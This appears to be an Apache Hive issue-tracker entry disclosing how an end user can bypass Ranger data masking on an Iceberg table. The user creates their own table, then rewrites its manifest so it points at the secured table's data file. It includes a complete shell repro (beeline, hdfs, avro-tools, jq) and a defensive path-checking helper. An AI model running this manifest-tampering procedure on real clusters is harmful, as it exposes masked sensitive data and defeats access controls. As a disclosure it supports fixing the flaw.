Details
- Improvement
- Status: Open
- Major
- Resolution: Unresolved
- 4.0.0-alpha-2
- None
Description
Set to bug/blocker instead of enhancement because of its security-related nature; Hive 4 should not be released without a fix for this. Please reset if needed.
FYI: this is similar to HIVE-27322, but it relies on Iceberg's internals and can't be fixed via the storage handler authorizer alone.
Context:
- There are some core tables with sensitive data that users can only query with data masking enforced (e.g. via Ranger). Let's assume this is the `default.icebergsecured` table.
- An end-user can only access the masked form of the sensitive data as expected...
- The users also have privilege to create new tables in their own sandbox databases - let's assume this is the `default.trojanhorse` table for now.
- The user can create a malicious table that exposes the sensitive data unmasked, leading to a possible data breach.
- Hive runs with doAs=false so that it can enforce FGAC and so that end users need no direct file-system access.
Repro:
- First make sure the data is secured by the masking policy:
<kinit as privileged user>
beeline -e "
DROP TABLE IF EXISTS default.icebergsecured PURGE;
CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) STORED BY ICEBERG;
INSERT INTO default.icebergsecured VALUES ('You might be allowed to see this.','You are NOT allowed to see this!');
"

<kinit as end user>
beeline -e "
SELECT * FROM default.icebergsecured;
"
+------------------------------------+--------------------------------+
| icebergsecured.txt                 | icebergsecured.secret          |
+------------------------------------+--------------------------------+
| You might be allowed to see this.  | MASKED BY RANGER FOR SECURITY  |
+------------------------------------+--------------------------------+
- Now let the user create the malicious table that exposes the sensitive data:
<kinit as end user>
beeline -e "
DROP TABLE IF EXISTS default.trojanhorseviadata;
CREATE EXTERNAL TABLE default.trojanhorseviadata (txt string, secret string) STORED BY ICEBERG LOCATION '/some-user-writeable-location/trojanhorseviadata';
INSERT INTO default.trojanhorseviadata VALUES ('placeholder','placeholder');
"

SECURE_DATA_FILE=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" beeline --outputformat=csv2 --showHeader=false --verbose=false --showWarnings=false --silent=true --report=false -e "SELECT file_path FROM default.icebergsecured.files;" 2>/dev/null)
TROJAN_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" beeline -e "DESCRIBE FORMATTED default.trojanhorseviadata;" 2>/dev/null |grep metadata_location |grep -v previous_metadata_location | awk '{print $5}')
TROJAN_MANIFESTLIST_LOCATION=$(hdfs dfs -cat $TROJAN_META_LOCATION |grep "manifest-list" |cut -f4 -d\")
hdfs dfs -get $TROJAN_MANIFESTLIST_LOCATION
TROJAN_MANIFESTLIST=$(basename $TROJAN_MANIFESTLIST_LOCATION)
TROJAN_MANIFESTFILE_LOCATION=$(avro-tools tojson $TROJAN_MANIFESTLIST |jq '.manifest_path' |tr -d \")
hdfs dfs -get $TROJAN_MANIFESTFILE_LOCATION
TROJAN_MANIFESTFILE=$(basename $TROJAN_MANIFESTFILE_LOCATION)
mv ${TROJAN_MANIFESTFILE} ${TROJAN_MANIFESTFILE}.orig
avro-tools tojson ${TROJAN_MANIFESTFILE}.orig |jq --arg fp "$SECURE_DATA_FILE" '.data_file.file_path = $fp' > ${TROJAN_MANIFESTFILE}.json
avro-tools getschema ${TROJAN_MANIFESTFILE}.orig > ${TROJAN_MANIFESTFILE}.schema
avro-tools fromjson --codec deflate --schema-file ${TROJAN_MANIFESTFILE}.schema ${TROJAN_MANIFESTFILE}.json > ${TROJAN_MANIFESTFILE}.new
hdfs dfs -put -f ${TROJAN_MANIFESTFILE}.new $TROJAN_MANIFESTFILE_LOCATION

beeline -e "SELECT * FROM default.trojanhorseviadata;"
+------------------------------------+-----------------------------------+
| trojanhorseviadata.txt             | trojanhorseviadata.secret         |
+------------------------------------+-----------------------------------+
| You might be allowed to see this.  | You are not allowed to see this!  |
+------------------------------------+-----------------------------------+
There are actually multiple ways to create such a table and modify the manifest or manifest list, such as reusing parts of the Iceberg code or simply using Spark, which needs direct end-user write access to the file system.
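For triage, one way to spot a table that was tampered with as in the repro is to compare the paths reported by its `files` metadata table against the table's own location. The following is only a minimal sketch under stated assumptions: `paths_outside_location` is a hypothetical helper (not part of Hive or Iceberg), paths and location are assumed to use the same form (both with or both without a scheme and authority), and `..` segments are not normalized. It is a detection aid, not a fix.

```shell
# Hypothetical helper: read file paths from stdin (one per line) and print
# every path that does NOT live under the given table location.
# Assumption: paths and location are written in the same form; no
# normalization of ".." segments or URI schemes is attempted.
paths_outside_location() {
  location="${1%/}"               # drop a single trailing slash, if any
  while IFS= read -r path; do
    [ -z "$path" ] && continue    # skip empty lines
    case "$path" in
      "$location"/*) ;;           # inside the table location: ignore
      *) printf '%s\n' "$path" ;; # outside: report it
    esac
  done
}

# Possible usage against the table from the repro (not executed here):
#   beeline --outputformat=csv2 --showHeader=false --silent=true \
#     -e "SELECT file_path FROM default.trojanhorseviadata.files;" 2>/dev/null \
#     | paths_outside_location '/some-user-writeable-location/trojanhorseviadata'
```

Any path printed by the helper points at a data file outside the table's declared location, which is what the manifest rewrite in the repro produces.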
Issue Links
- relates to
- IMPALA-12584 Add backend config to restrict data file locations for Iceberg tables (Resolved)
- HIVE-27713 Iceberg: metadata location overrides can cause data breach (Closed)